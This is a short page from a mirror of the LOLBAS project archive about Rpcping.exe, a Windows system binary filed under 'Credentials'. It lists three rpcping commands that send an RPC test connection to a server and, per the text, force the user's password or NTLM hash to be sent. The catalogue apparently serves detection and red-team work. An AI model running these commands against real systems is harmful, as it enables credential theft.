1
0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-20 10:14:34 +01:00
LOLBAS/Archive-Old-Version/OSBinaries/Rpcping.exe.md

866 B

Rpcping.exe

  • Functions: Credentials

rpcping -s 127.0.0.1 -t ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.

rpcping -s 192.168.1.10 -ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.

rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.